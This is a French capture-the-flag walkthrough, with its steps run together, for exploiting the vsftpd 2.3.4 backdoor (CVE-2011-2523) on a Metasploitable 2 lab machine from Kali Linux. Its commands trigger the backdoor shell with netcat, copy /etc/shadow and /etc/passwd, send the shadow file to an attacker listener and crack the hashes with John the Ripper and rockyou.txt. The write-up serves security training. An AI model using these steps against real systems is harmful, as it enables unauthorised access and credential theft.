
Procédure pas à pas CTF exploitant la backdoor vsftpd 2.3.4 (CVE-2011-2523) pour capturer et craquer /etc/shadow et /etc/passwd de Metasploitable 2.
Capturez les fichiers /etc/shadow et /etc/passwd déchiffrés du serveur vulnérable Metasploitable 2.
Pour ce CTF, nous utilisons VMware Workstation Pro avec deux machines virtuelles. Nous utilisons Kali Linux comme machine de l'attaquant et Metasploitable 2 comme machine vulnérable.
Open a Virtual Machine dans VMware Workstation et sélectionnez le fichier Kali Linux décompresséopen, puis sélectionnez le fichier Metasploitable 2 décompresséPlay virtual machine sur les deux machines virtuellesI moved It ou I copied It, choisissez I copied Itkali comme nom d'utilisateur et mot de passemsfadmin comme nom d'utilisateur et mot de passeip addr show et enregistrez l'adresse IP de la section inetLe Massachusetts Institute of Technology Research and Engineering détaille CVE-2011-2523 comme une vulnérabilité et exposition courante où vsftpd 2.3.4 téléchargé entre le 30 juin 2011 et le 3 juillet 2011 contient une porte dérobée qui ouvre un shell sur le port 6200/tcp.
nmap <vulnerable-machine-ip-address>nc <vulnerable-machine-ip-address> 21:) à la fin, entrez user <chaîne>:)pass <chaîne> nc -v <vulnerable-machine-ip-address> 6200ip addr showwhoami/etc/shadow et /etc/passwd dans un autre fichiercp /etc/shadow shadow.txtcp /etc/passwd passwd.txtinet à l'aide de la commande ip addr shownc -l -p 1234 > shadow.txt sur la machine attaquantenc -w 3 <destination-ip> 1234 < shadow.txtJohnunshadow passwd.txt shadow.txt > unshadowed-inputcat unshadowed-input, il devrait contenir le nom d'utilisateur et le mot de passeJohn et d'une liste de motsrockyou.txt pour casser les hachages avec johnsudo gzip -d /usr/share/wordlists/rockyou.txt.gzkalijohn unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txtjohn –show unshadowed-input